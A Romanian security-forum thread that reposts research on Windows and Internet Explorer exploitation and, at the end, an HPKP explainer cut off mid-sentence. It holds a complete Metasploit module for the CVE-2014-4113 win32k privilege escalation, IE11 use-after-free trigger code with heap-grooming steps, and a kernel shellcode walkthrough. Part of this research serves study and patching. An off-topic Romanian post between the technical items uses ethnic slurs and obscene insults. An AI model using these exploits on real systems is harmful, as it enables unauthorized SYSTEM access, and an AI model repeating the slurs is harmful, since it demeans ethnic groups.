Nytro

[h=3]Microsoft EMET - Armor against zero-days bypassed again | Conference Slides[/h]New methods make it possible to circumvent protection mechanisms of Microsoft EMET 5.0 The EMET (Enhanced Mitigation Experience Toolkit) tool developed by Microsoft makes it possible for administrators and end users to retroactively equip applications with additional protection mechanisms. This enhanced protection is intended to prevent various attack techniques that are currently used by cyber attackers. Security expert René Freingruber of the SEC Consult Vulnerability Lab has developed numerous methods to get around the basic protection mechanisms of EMET in all currently available versions. If a cyber-attacker were to use these new bypass methods, serious attacks could be carried out. A software product protected with EMET as a workaround affected by a critical zero-day vulnerability could, for example, fall under the control of attackers. Microsoft was informed of this by SEC Consult and is working on an improvement to the protection methods. The experts of the SEC Consult Vulnerability Lab advise you to not view EMET as an unbeatable protection measure, because the tool can definitely be bypassed with the help of newly discovered methods. SEC Consult considers it as necessary for software manufacturers to make the development of applications more secure and to regularly test their software extensively for application security. [h=3] Demo video[/h] A video demonstrating the issues has been released: http://youtu.be/TuBQnvnKKHY [h=3] Slides[/h] Detailed slides from previous conferences, where the research has been presented by René Freingruber, are available here: RuxCon, 11-12 October 2014 Short bio/description: https://ruxcon.org.au/speakers/#Ren%C3%A9%20Freingruber Slides: http://prezi.com/z0kjt1wi_9nl/ruxcon-2014-emet-50-armor-or-curtain/ ToorCon, 25-26 October 2014 Short bio/description: http://sandiego.toorcon.net/conference/#7 Slides: http://prezi.com/qodsslaplj7j/toorcon-2014-emet-50-armor-or-curtain/ Sursa: SEC Consult: Microsoft EMET - Armor against zero-days bypassed again | Conference Slides

[h=1]Windows 8.1 Security Internals[/h] Date: October 28, 2014 from 5:00PM to 6:15PM Day 1 Hall 8.0 Room B1 WIN-B411 Speakers: Chris Jackson [h=3]Download[/h] [h=3]How do I download the videos?[/h] To download, right click the file type you would like and pick “Save target as…” or “Save link as…” [h=3]Why should I download videos from Channel9?[/h] It's an easy way to save the videos you like locally. You can save the videos in order to watch them offline. If all you want is to hear the audio, you can download the MP3! [h=3]Which version should I choose?[/h] If you want to view the video on your PC, Xbox or Media Center, download the High Quality MP4 file (this is the highest quality version we have available). If you'd like a lower bitrate version, to reduce the download time or cost, then choose the Medium Quality MP4 file. If you have a Windows Phone, iPhone, iPad, or Android device, choose the low or medium MP4 file. If you just want to hear the audio of the video, choose the MP3 file. Right click “Save as…” Slides (view online) High Quality MP4 (iPad, PC, Xbox) MP4 (iPhone, Android) Windows continues to innovate on its implementation of core operating system security. To achieve the conflicting goals of security and compatibility, it can be complex. How do you understand how it works? Join "The App Compat Guy" for a deep dive into the operating system internals where security decisions begin. This is an operating system internals session, and not a packaged software session. Sursa: Windows 8.1 Security Internals | TechEd Europe 2014 | Channel 9

AFD.SYS DANGLING POINTER VULNERABILITY Pwn2Own 2014 TABLE OF CONTENTS Affected OS ......................................................................................................................................................................... 2 Overview ............................................................................................................................................................................. 2 Impact ................................................................................................................................................................................. 2 Technical Analysis ............................................................................................................................................................... 3 POC code ......................................................................................................................................................................... 3 Vulnerability Analysis ...................................................................................................................................................... 4 Step 1 - IOCTL 0x1207f ................................................................................................................................................ 5 Step 2 - IOCTL 0x120c3 ............................................................................................................................................... 8 Exploitation ..................................................................................................................................................................... 9 READ-/WRITE-Primitives through WorkerFactory Objects ....................................................................................... 10 Controlled Data on NonPagedPoolNx Pool ............................................................................................................... 11 Leak Target ............................................................................................................................................................... 12 Single-Gadget-ROP for SMEP Evasion ....................................................................................................................... 12 Shellcode ................................................................................................................................................................... 13 Putting it all together ................................................................................................................................................ 13 Patch Analysis ................................................................................................................................................................... 14 Download: http://www.siberas.de/papers/Pwn2Own_2014_AFD.sys_privilege_escalation.pdf

@Andrei

Cum am primit 50 de lei ca s?-l aplaud pe Victor Ponta | Iulia Marin | adevarul.ro

Daca nu mergeti la vot demonstrati ca sunteti prosti, ignoranti si ca nu va pasa de tara in care traiti. Si nici de voi. Ulterior va plangeti de presendinte, dar nu realizati ca din cauza voastra se ajunge asa. Nu demonstrati nimanui nimic. Nu o sa ii pese nimanui ca ies la vot doar 30% dintre persoanele cu drept de vot dintre care jumatate sunt bozgori, tigani si babe proaste. Astia or sa va decida viitorul pentru ca voi stati in fata monitorului si dati la laba. Asadar, pe viitor, cand nu va convine ceva in tara ganditi-va la urmatorul gand pe care vi-l ofer cu drag: SUGETI PULA.

CVE-2014-4113 Detailed Vulnerability and Patch Analysis Posted on: 24 October 2014 By: siteadm As you might have heard, Microsoft recently patched some vulnerabilities; vulnerabilities related to Sandworm CVE-2014-4114 (Powerpoint exploit) and font parsing (CVE-2014-4148). But in this article, I'm more interested to talk about CVE-2014-4113, which is a local kernel vulnerability that successful exploitation would give you SYSTEM access. So I started analyzing patch (KB3000061) and mid-analysis, I found a PoC for this vulnerability in the wild. Therefore I combined my patch analysis and reverse engineering of PoC binary together to deeply understand this vulnerability and exploitation technique. Here, I'll share it step by step, with all details, so you'll know everything about CVE-2014-4113. First of all, I downloaded KB3000061 and I noticed that it just does have win32k.sys inside. So I created two folders called Vulnerable and Patched and placed vulnerable and patched versions of win32k.sys inside them. Next, I loaded both of them in IDA and saved both databases. As next step I had to see what've changed in patched version, so I chose TurboDiff for this job. TurboDiff simply gives you a plain-text table of changed functions. For this particular patch, it gave me 25 changed function. I started checking each changed function and one of them caught my attention. In the internal function of xxxHandleMenuMessages, I noticed that patched version does have an additional check for returned value from xxxMNFindWindowFromPoint (internal function). That check was a call to IsMFMWFPWindow function and parameter to IsMFMWFPWindow was exactly return value of xxxMNFindWindowFromPoint. So I figured out that here something was wrong and Microsoft added a code to check return value of xxxMNFindWindowFromPoint. You can see change here: Vulnerable win32k.sys Patched version: Take a look at both functions with zoom out, vulnerable part: Patched part: Knowing this, I started to think about exploitation method of this vulnerability, how to trigger this vulnerability and make xxxHandleMenuMessages API to call xxxSendMessage with an invalid HANDLE. As soon as I saw that the vulnerability is related to window system and possible NULL value during xxxHandleMenuMessage process, I just remembered this. For exploiting that, you had to map zero/null page, create a fake object at zero page and trigger the vulnerability. So this was the general idea, now I had to find a way to trigger this vulnerability by causing xxxHandleMenuMessage call xxxSendMessage with a NULL handle. Luckily I suddenly saw that there is a PoC published online for this vulnerability, so as a lazy person, instead of trying to solve it on my own as a practice/challenge, I just downloaded the sample and started to analyze it. Lots of things was as I thought, the only missing part in chain of exploitation was how to make that NULL in xxxHandleMenuMessage. It was done by hooking and altering parameters in user mode, you can read more about these tricks here and here. So basically the PoC deletes the menu and returns -5, so xxxSendMessage will use a tagWND object starting from -5 (0xFFFFFFFB) to positive values which is in user-mode. The PoC allocated zero-page using ZwAllocateVirtualMemory with 0x01 as base address and writes a fake tagWND object here. Windows allows zero page allocation for 16-bit application compatibility/support. So the tagWND object have two important parts, one is WS_EXECUTE_IN_KERNEL flag which is at offset ((BYTE*)&pWnd->state)+0x02 and the other one is callback function which is at offset 0x60. So by setting 0x16 to 0x04, you are telling kernel that the callback function at 0x60 needs to be executed in kernel. So the PoC modifies return value (returns -5) by hooking, but before that, it writes 0x04 to 0x16 - 0x05 (0x11) offset (WS_EXECUTE_IN_KERNEL flag) and address of shellcode at 0x60 - 0x05 (0x5B) -which will be executed in kernel-. See: The shellcode does nothing other than replacing current process token with SYSTEM process (pid = 4) token. Therefore, any process created by current process will have SYSTEM token too. Here is the shellcode: and here is what zero page looks like: Cyan color holds address of shellcode and yellow background holds WS_EXECUTE_IN_KERNEL flag. For triggering the vulnerability, simply it creates two layer popup menu (one main popup menu and one sub menu inside it), then it calls TrackPopupMenu to trigger the hook. In hook function, it replaces window handler using SetWindowLongA API, see: and new handler function, simply deletes popup menu and returns 0xFFFFFFFB (-5): That was it. Using this simple hooking and altering popup menu, kernel will call and execute callback function at null page, in kernel space. I think I've said enough about this bug. So please update your OS, specially servers, as soon as possible, because lowest access (for example ASP.NET shell with ASP.NET user account) can get SYSTEM access using this vulnerability. Sursa: https://www.codeandsec.com/CVE-2014-4113-Detailed-Vulnerability-and-Patch-Analysis

[h=1]Windows TrackPopupMenu Win32k NULL Pointer Dereference[/h] ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' require 'rex' class Metasploit3 < Msf::Exploit::Local Rank = NormalRanking include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Process include Msf::Post::Windows::FileInfo include Msf::Post::Windows::ReflectiveDLLInjection def initialize(info={}) super(update_info(info, { 'Name' => 'Windows TrackPopupMenu Win32k NULL Pointer Dereference', 'Description' => %q{ This module exploits a NULL Pointer Dereference in win32k.sys, the vulnerability can be triggered through the use of TrackPopupMenu. Under special conditions, the NULL pointer dereference can be abused on xxxSendMessageTimeout to achieve arbitrary code execution. This module has been tested successfully on Windows XP SP3, Windows 2003 SP2, Windows 7 SP1 and Windows 2008 32bits. Also on Windows 7 SP1 and Windows 2008 R2 SP1 64 bits. }, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', # vulnerability discovery and exploit in the wild 'juan vazquez', # msf module (x86 target) 'Spencer McIntyre' # msf module (x64 target) ], 'Arch' => [ ARCH_X86, ARCH_X86_64 ], 'Platform' => 'win', 'SessionTypes' => [ 'meterpreter' ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Targets' => [ # Tested on (32 bits): # * Windows XP SP3 # * Windows 2003 SP2 # * Windows 7 SP1 # * Windows 2008 [ 'Windows x86', { 'Arch' => ARCH_X86 } ], # Tested on (64 bits): # * Windows 7 SP1 # * Windows 2008 R2 SP1 [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ] ], 'Payload' => { 'Space' => 4096, 'DisableNops' => true }, 'References' => [ ['CVE', '2014-4113'], ['OSVDB', '113167'], ['BID', '70364'], ['MSB', 'MS14-058'], ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/'] ], 'DisclosureDate' => 'Oct 14 2014', 'DefaultTarget' => 0 })) end def check os = sysinfo["OS"] if os !~ /windows/i return Exploit::CheckCode::Unknown end if sysinfo["Architecture"] =~ /(wow|x)64/i arch = ARCH_X86_64 elsif sysinfo["Architecture"] =~ /x86/i arch = ARCH_X86 end file_path = expand_path("%windir%") << "\\system32\\win32k.sys" major, minor, build, revision, branch = file_version(file_path) vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}") # Neither target suports Windows 8 or 8.1 return Exploit::CheckCode::Safe if build == 9200 return Exploit::CheckCode::Safe if build == 9600 if arch == ARCH_X86 return Exploit::CheckCode::Detected if [2600, 3790, 7600, 7601].include?(build) else return Exploit::CheckCode::Detected if build == 7601 end return Exploit::CheckCode::Unknown end def exploit if is_system? fail_with(Exploit::Failure::None, 'Session is already elevated') end if check == Exploit::CheckCode::Safe fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.") end if sysinfo["Architecture"] =~ /wow64/i fail_with(Failure::NoTarget, 'Running against WOW64 is not supported') elsif sysinfo["Architecture"] =~ /x64/ && target.arch.first == ARCH_X86 fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86') elsif sysinfo["Architecture"] =~ /x86/ && target.arch.first == ARCH_X86_64 fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64') end print_status('Launching notepad to host the exploit...') notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true}) begin process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS) print_good("Process #{process.pid} launched.") rescue Rex::Post::Meterpreter::RequestError # Reader Sandbox won't allow to create a new process: # stdapi_sys_process_execute: Operation failed: Access is denied. print_status('Operation failed. Trying to elevate the current process...') process = client.sys.process.open end print_status("Reflectively injecting the exploit DLL into #{process.pid}...") if target.arch.first == ARCH_X86 dll_file_name = 'cve-2014-4113.x86.dll' else dll_file_name = 'cve-2014-4113.x64.dll' end library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-4113', dll_file_name) library_path = ::File.expand_path(library_path) print_status("Injecting exploit into #{process.pid}...") exploit_mem, offset = inject_dll_into_process(process, library_path) print_status("Exploit injected. Injecting payload into #{process.pid}...") payload_mem = inject_into_process(process, payload.encoded) # invoke the exploit, passing in the address of the payload that # we want invoked on successful exploitation. print_status('Payload injected. Executing exploit...') process.thread.create(exploit_mem + offset, payload_mem) print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.') end end Sursa: http://www.exploit-db.com/exploits/35101/

USE-AFTER-FREE NOT DEAD IN INTERNET EXPLORER: PART 1 In HITCON X, we talked about bypassing new exploit mitigation in Internet Explorer. In this post, we will use a use-after-free vulnerability which has been patched in MS14-056 to explain how to bypass memory protection and isolated heap in Windows 8.1. Let's look into the following code first: <!DOCTYPE html> <html> <head> <title>test</title> <script> function listener(event) { head.removeNode(true); } function test() { var object = document.createElement("object"); head = document.getElementsByTagName("head")[0]; head.applyElement(object, "inside"); object.addEventListener("error", listener, false); var range = document.createRange(); range.setStartAfter(object); range.insertNode(object); object["innerHTML"] = object["innerHTML"]; document.write(""); } </script> </head> <body onload="test()"></body> </html> Internet Explorer 11 will crash here with page heap enabled and memory protection disabled: (29c.98c): Access violation - code c0000005 (!!! second chance !!!) eax=00000005 ebx=07530fe8 ecx=04109fc0 edx=04151cd4 esi=00000005 edi=04109fc0 eip=613fb9fc esp=03eaa89c ebp=03eaa8a4 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 MSHTML!CElement::GetFirstCp+0x7: 613fb9fc 8b411c mov eax,dword ptr [ecx+1Ch] ds:0023:04109fdc=???????? 0:005> !heap -p-a ecx address 04109fc0 found in _DPH_HEAP_ROOT @ 40b1000 in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize) 40b16e4: 4109000 2000 *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\system32\verifier.dll - 6e258fc2 verifier!VerifierDisableFaultInjectionExclusionRange+0x00003232 770e48fc ntdll!RtlDebugFreeHeap+0x00000032 770a5ed1 ntdll!RtlpFreeHeap+0x00069d01 7703be35 ntdll!RtlFreeHeap+0x00000485 6159def9 MSHTML!MemoryProtection::CMemoryProtector::ProtectedFree+0x00000122 614a0bb5 MSHTML!CNoShowElement::`vector deleting destructor'+0x0000002d 610359df MSHTML!CBase::SubRelease+0x0000002e 6146c702 MSHTML!CElement::Release+0x00000018 61442fdd MSHTML!CSpliceRecordList::~CSpliceRecordList+0x0000006e 61050506 MSHTML!CDoc::CutCopyMove+0x00002181 610d3f58 MSHTML!RemoveWithBreakOnEmpty+0x00000068 6105243d MSHTML!InjectHtmlStream+0x0000021b 6100226e MSHTML!HandleHTMLInjection+0x00000091 61476894 MSHTML!CElement::InjectInternal+0x000002a9 6104f7ad MSHTML!CElement::InjectTextOrHTML+0x0000016d 6104fa09 MSHTML!CFastDOM::CHTMLElement::Trampoline_Set_innerHTML+0x00000056 6cef8e9d jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x00000165 6cef9712 jscript9!<lambda_73b9149c3f1de98aaab9368b6ff2ae9d>::operator()+0x0000006b 6cf471af jscript9!Js::JavascriptOperators::SetProperty_Internal<0>+0x000000bd 6cf46ea2 jscript9!Js::JavascriptOperators::OP_SetProperty+0x00000040 6cf46ee3 jscript9!Js::JavascriptOperators::PatchPutValueNoFastPath+0x0000004d 6cf478fc jscript9!Js::InterpreterStackFrame::Process+0x00002d6d 6cef6548 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x000001e8 0:005> k ChildEBP RetAddr 03eaa8a4 61677ba1 MSHTML!CElement::GetFirstCp+0x7 03eaa8c4 61479cec MSHTML!CTitleElement::Notify+0x5d4c84 03eaadf4 6105248c MSHTML!CDoc::CutCopyMove+0x1b4b 03eaaf44 6100226e MSHTML!InjectHtmlStream+0x26a 03eaaf88 61476894 MSHTML!HandleHTMLInjection+0x91 03eab080 6104f7ad MSHTML!CElement::InjectInternal+0x2a9 03eab100 6104fa09 MSHTML!CElement::InjectTextOrHTML+0x16d 03eab128 6cef8e9d MSHTML!CFastDOM::CHTMLElement::Trampoline_Set_innerHTML+0x56 03eab190 6cef9712 jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x165 03eab1b0 6cef967e jscript9!<lambda_73b9149c3f1de98aaab9368b6ff2ae9d>::operator()+0x6b 03eab1f8 6cf471af jscript9!Js::JavascriptOperators::CallSetter+0x76 03eab220 6cf46ea2 jscript9!Js::JavascriptOperators::SetProperty_Internal<0>+0xbd 03eab240 6cf46ee3 jscript9!Js::JavascriptOperators::OP_SetProperty+0x40 03eab27c 6cf478fc jscript9!Js::JavascriptOperators::PatchPutValueNoFastPath+0x4d 03eab5c8 6cef6548 jscript9!Js::InterpreterStackFrame::Process+0x2d6d 03eab704 07620fd9 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x1e8 WARNING: Frame IP not in any known module. Following frames may be wrong. 03eab710 6cef6ce9 0x7620fd9 03eaba58 6cef6548 jscript9!Js::InterpreterStackFrame::Process+0x1cd7 03eabb74 07620fe1 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x1e8 03eabb80 6cef0685 0x7620fe1 03eabbc8 6cef100e jscript9!Js::JavascriptFunction::CallFunction<1>+0x88 03eabc34 6cef0f60 jscript9!Js::JavascriptFunction::CallRootFunction+0x93 03eabc7c 6cef0ee7 jscript9!ScriptSite::CallRootFunction+0x42 03eabca4 6cef993c jscript9!ScriptSite::Execute+0x6c 03eabd00 6cef9878 jscript9!ScriptEngineBase::ExecuteInternal<0>+0xbb 03eabd18 610fb78f jscript9!ScriptEngineBase::Execute+0x1c 03eabdcc 610fb67c MSHTML!CListenerDispatch::InvokeVar+0x102 03eabdf8 610fb21e MSHTML!CListenerDispatch::Invoke+0x61 03eabe90 6159cfe0 MSHTML!CEventMgr::_InvokeListeners+0x1a2 03eabea8 61469d60 MSHTML!CEventMgr::_InvokeListenersOnWindow+0x42 03eabf30 610fb385 MSHTML!CEventMgr::_InvokeListeners+0xe5 03eac0a0 60ef98bb MSHTML!CEventMgr::Dispatch+0x35a 03eac0c8 60f2f149 MSHTML!CEventMgr::DispatchEvent+0x8c 03eac0f8 60f2f774 MSHTML!COmWindowProxy::Fire_onload+0x120 03eac158 60f2ea16 MSHTML!CMarkup::OnLoadStatusDone+0x412 03eac16c 60f2e2e3 MSHTML!CMarkup::OnLoadStatus+0xc2 03eac5b0 60f290bd MSHTML!CProgSink::DoUpdate+0x4a7 03eac5bc 60e81f12 MSHTML!CProgSink::OnMethodCall+0x12 03eac600 60e68dda MSHTML!GlobalWndOnMethodCall+0x12c *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\system32\user32.dll - 03eac64c 76e675b3 MSHTML!GlobalWndProc+0x15c 03eac678 76e677b8 user32!gapfnScSendMessage+0x18b 03eac6f8 76e679e6 user32!gapfnScSendMessage+0x390 03eac758 76e6783b user32!DispatchMessageW+0x1bb *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\SYSTEM32\IEFRAME.dll - 03eac764 67478eb4 user32!DispatchMessageW+0x10 03eaf930 674b0a07 IEFRAME!DllCanUnloadNow+0x1541 *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\SYSTEM32\iertutil.dll - 03eaf9e8 6fcc6bac IEFRAME!SetQueryNetSessionCount+0x486 *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Internet Explorer\IEShims.dll - 03eaf9f8 6e21bcf2 iertutil!Ordinal101+0x3b7 *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\system32\KERNEL32.DLL - 03eafa24 753917ad IEShims!IEShims_CreateWindowEx+0x3607 03eafa30 77063af4 KERNEL32!BaseThreadInitThunk+0x12 03eafa74 77063acd ntdll!__RtlUserThreadStart+0x20 03eafa84 00000000 ntdll!_RtlUserThreadStart+0x1b It's a CTitleElement use-after-free vulnerability. However, Internet Explorer won't crash if we enable memory protection, so we add CollectGarbage2 into the code: <!DOCTYPE html> <html> <head> <title>test</title> <script> function CollectGarbage2() { var button = document.createElement("button"); button.title = new Array(100000).join("0"); button.title = null; CollectGarbage(); } function listener(event) { head.removeNode(true); } function test() { var object = document.createElement("object"); head = document.getElementsByTagName("head")[0]; head.applyElement(object, "inside"); object.addEventListener("error", listener, false); var range = document.createRange(); range.setStartAfter(object); range.insertNode(object); object["innerHTML"] = object["innerHTML"]; CollectGarbage2(); document.write(""); } </script> </head> <body onload="test()"></body> </html> Internet Explorer 11 will crash here: (418.172c): Access violation - code c0000005 (!!! second chance !!!) eax=04959fc0 ebx=049a1b00 ecx=06437fe8 edx=04959ff8 esi=049cffc0 edi=046fac08 eip=61003419 esp=046fabd4 ebp=046fabec iopl=0 nv up ei ng nz na pe cy cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010287 MSHTML!CTitleElement::Notify+0xcd: 61003419 8b02 mov eax,dword ptr [edx] ds:0023:04959ff8=???????? We've bypassed memory protection obviously. Let's look into MSHTML!CTitleElement::Notify: .text:63857828 loc_63857828: .text:63857828 test eax, eax .text:6385782A jz short loc_63857834 .text:6385782C cmp eax, esi .text:6385782E jnz loc_63783416 .text:63783416 loc_63783416: .text:63783416 lea edx, [eax+38h] .text:63783419 mov eax, [edx] ; retrieve freed CTitleElement and use .text:6378341B jmp loc_63857828 We need to control 0x38 of CTitleElement accordingly. In HITCON X, we manipulate LFH to bypass isolated heap in Windows 7. However, Windows 8 introduces frontend allocation randomization, so manipulating LFH is not a good solution. But backend allocation is not randomized, which can be used to bypass isolated heap. Let's look into the following code first: <!DOCTYPE html> <html> <head> <script> function CollectGarbage2() { var button = document.createElement("button"); button.title = new Array(100000).join("0"); button.title = null; CollectGarbage(); } var junk = new Array(); for (var i = 0; i < 4; i++) { junk[i] = document.createElement("title"); } var title = new Array(); for (var i = 0; i < 4; i++) { title[i] = document.createElement("title"); } title[2] = null; CollectGarbage2(); CollectGarbage2(); // 1 </script> <title>test</title> <script> function listener(event) { head.removeNode(true); } function test() { // 2 var object = document.createElement("object"); head = document.getElementsByTagName("head")[0]; head.applyElement(object, "inside"); object.addEventListener("error", listener, false); var range = document.createRange(); range.setStartAfter(object); range.insertNode(object); object["innerHTML"] = object["innerHTML"]; title[0] = null; title[1] = null; title[3] = null; CollectGarbage2(); CollectGarbage2(); // 3 var area = new Array(); for (var i = 0; i < 0x11; i++) { area[i] = document.createElement("area"); } for (var i = 0; i < 0x11; i++) { area[i].shape = "rect"; area[i].coords = "1094795585,1094795585,1094795585,1094795585"; } // 4 document.write(""); } </script> </head> <body onload="test()"></body> </html> We disable page heap to see how to bypass isolated heap. 1. First, we create 4 CTitleElement to prevent heap coalescing with previous heap. Then, we create another 4 CTitleElement and make a hole. 030e4500 0009 0009 [00] 030e4508 00040 - (busy) // junk[3] MSHTML!CTitleElement::`vftable' 030e4548 0009 0009 [00] 030e4550 00040 - (busy) // title[0] MSHTML!CTitleElement::`vftable' 030e4590 0009 0009 [00] 030e4598 00040 - (busy) // title[1] MSHTML!CTitleElement::`vftable' 030e45d8 0009 0009 [00] 030e45e0 00040 - (free) // hole 030e4620 0009 0009 [00] 030e4628 00040 - (busy) // title[3] MSHTML!CTitleElement::`vftable' 2. We fill the hole with the use-after-free CTitleElement. We need to control 0x030e45e0 + 0x38. 030e4500 0009 0009 [00] 030e4508 00040 - (busy) // junk[3] MSHTML!CTitleElement::`vftable' 030e4548 0009 0009 [00] 030e4550 00040 - (busy) // title[0] MSHTML!CTitleElement::`vftable' 030e4590 0009 0009 [00] 030e4598 00040 - (busy) // title[1] MSHTML!CTitleElement::`vftable' 030e45d8 0009 0009 [00] 030e45e0 00040 - (busy) // the use-after-free CTitleElement MSHTML!CTitleElement::`vftable' 030e4620 0009 0009 [00] 030e4628 00040 - (busy) // title[3] MSHTML!CTitleElement::`vftable' 3. We trigger freeing of the use-after-free CTitleElement and free other CTitleElement of the title array to trigger heap coalescing. 030e4500 0009 0009 [00] 030e4508 00040 - (busy) // junk[3] MSHTML!CTitleElement::`vftable' 030e4548 0024 0009 [00] 030e4550 00118 - (free) // coalesced heap 4. We fill the coalesced heap with CAreaElement to control 0x030e45e0 + 0x38. 030e4500 0009 0009 [00] 030e4508 00040 - (busy) MSHTML!CTitleElement::`vftable' 030e4548 000e 0009 [00] 030e4550 00064 - (busy) MSHTML!CAreaElement::`vftable' 030e45b8 000e 000e [00] 030e45c0 00064 - (busy) MSHTML!CAreaElement::`vftable' 0:006> dd 0x030e45e0 + 0x38 030e4618 41414141 00000000 00000001 00000000 030e4628 64548e48 0000d8fa 030e4cf0 030e58a0 030e4638 00000000 00000000 00000000 00000000 030e4648 00000000 00000000 00000000 00000000 030e4658 00000000 00000000 00000000 00000000 030e4668 61558e4c 0800d8fc 00000000 00000000 030e4678 00000000 00000000 00000000 00000000 030e4688 00000000 00000000 00000000 00000000 As we can see, we've bypassed isolated heap. (818.a74): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=41414141 ebx=030e5300 ecx=00ae7f88 edx=41414179 esi=030e7400 edi=02fdabd8 eip=72cd3419 esp=02fdaba4 ebp=02fdabbc iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 MSHTML!CTitleElement::Notify+0xcd: 72cd3419 8b02 mov eax,dword ptr [edx] ds:002b:41414179=???????? Sursa: KeenTeam - Blog

HTTP Public-Key-Pinning explained In my last post “Deploying TLS the hard way” I explained how TLS and its extensions (as well as a few HTTP extensions) work and what to watch out for when enabling TLS for your server. One of the HTTP extensions mentioned is HTTP Public-Key-Pinning (HPKP). As a short reminder, the header looks like this: Public-Key-Pins: pin-sha256="GRAH5Ex+kB4cCQi5gMU82urf+6kEgbVtzfCSkw55AGk="; pin-sha256="lERGk61FITjzyKHcJ89xpc6aDwtRkOPAU0jdnUqzW2s="; max-age=15768000; includeSubDomains You can see that it specifies two pin-sha256 values, that is the pins of two public keys. One is the public key of your currently valid certificate and the other is a backup key in case you have to revoke your certificate. I received a few questions as to why I suggest including a backup pin and what the requirements for a backup key would be. I will try to answer those with a more detailed overview of how public key pinning and TLS certificates work. How are RSA keys represented? Let us go back to the beginning and start by taking a closer look at RSA keys: $ openssl genrsa 4096 The above command generates a 4096 bit RSA key and prints it to the console. Although it says -----BEGIN RSA PRIVATE KEY----- it does not only return the private key but an ASN.1 structure that also contains the public key - we thus actually generated an RSA key pair. A common misconception when learning about keys and certificates is that the RSA key itself for a given certificate expires. RSA keys however never expire - after all they are just three numbers. Only the certificate containing the public key can expire and only the certificate can be revoked. Keys “expire” or are “revoked” as soon as there are no more valid certificates using the public key, and you threw away the keys and stopped using them altogether. What does the TLS certificate contain? By submitting the Certificate Signing Request (CSR) containing your public key to a Certificate Authority it will issue a valid certificate. That will again contain the public key of the RSA key pair we generated above and an expiration date. Both the public key and the expiration date will be signed by the CA so that modifications of any of the two would render the certificate invalid immediately. For simplicity I left out a few other fields that X.509 certificates contain to properly authenticate TLS connections, for example your server’s hostname and other details. How does public key pinning work? The whole purpose of public key pinning is to detect when the public key of a certificate for a specific host has changed. That may happen when an attacker compromises a CA such that they are able to issue valid certificates for any domain. A foreign CA might also just be the attacker, think of state-owned CAs that you do not want to be able to {M,W}ITM your site. Any attacker intercepting a connection from a visitor to your server with a forged certificate can only be prevented by detecting that the public key has changed. After the server sent a TLS certificate with the handshake, the browser will look up any stored pins for the given hostname and check whether any of those stored pins match any of the SPKI fingerprints (the output of applying SHA-256 to the public key information) in the certificate chain. The connection must be terminated immediately if pin validation fails. If the browser does not find any stored pins for the current hostname then it will directly continue with the usual certificate checks. This might happen if the site does not support public key pinning and does not send any HPKP headers at all, or if this is the first time visiting and the server has not seen the HPKP header yet in a previous visit. Pin validation should happen as soon as possible and thus before any basic certificate checks are performed. An expired or revoked certificate will be happily accepted at the pin validation stage early in the handshake when any of the SPKI fingerprints of its chain match a stored pin. Only a little later the browser will see that the certificate already expired or was revoked and will reject it. Pin validation also works for self-signed certificates, but they will of course raise the same warnings as usual as soon as the browser determined they were not signed by a trusted third-party. What if your certificate was revoked? If your server was compromised and an attacker obtained your private key you have to revoke your certificate as the attacker can obviously fully intercept any TLS connection to your server and record every conversation. If your HPKP header contained only a single pin-sha256 token you are out of luck until the max-age directive given in the header lets those pins expire in your visitors’ browsers. Pin validation requires checking the SPKI fingerprints of all certificates in the chain. When for example StartSSL signed your certificate you have another intermediate Class 1 or 2 certificate and their root certificate in the chain. The browser trusts only the root certificate but the intermediate ones are signed by the root certificate. The intermediate certificate in turn signs the certificate deployed on your server and that is called a chain of trust. To prevent getting stuck after your only pinned key was compromised, you could for example provide the SPKI fingerprint of StartSSL’s Class 1 intermediate certificate. An attacker would now have to somehow get a certificate issued by StartSSL’s Class 1 tier to successfully impersonate you. You are however again out of luck should you decide to upgrade to Class 2 in a month because you decided to start paying for a certificate. Pinning StartSSL’s root certificate would let you switch Classes any time and the attacker would still have to get a certificate issued by StartSSL for your domain. This is a valid approach as long as you are trusting your CA (really?) and as long as the CA itself is not compromised. In case of a compromise however the attacker would be able to get a valid certificate for your domain that passes pin validation. After the attack was discovered StartSSL would quickly revoke all currently issued certificates, generate a new key pair for their root certificate and issue new certificates. And again we would be out of luck because suddenly pin validation fails and no browser will connect to our site. Include the pin of a backup key The safest way to pin your certificate’s public key and be prepared to revoke your certificate when necessary is to include the pin of a second public key: your backup key. This backup RSA key should in no way be related to your first key, just generate a new one. A good advice is to keep this backup key pair (especially the private key) in a safe place until you need it. Uploading it to the server is dangerous: when your server is compromised you lose both keys at once and have no backup key left. Generate a pin for the backup key exactly as you did for the current key and include both 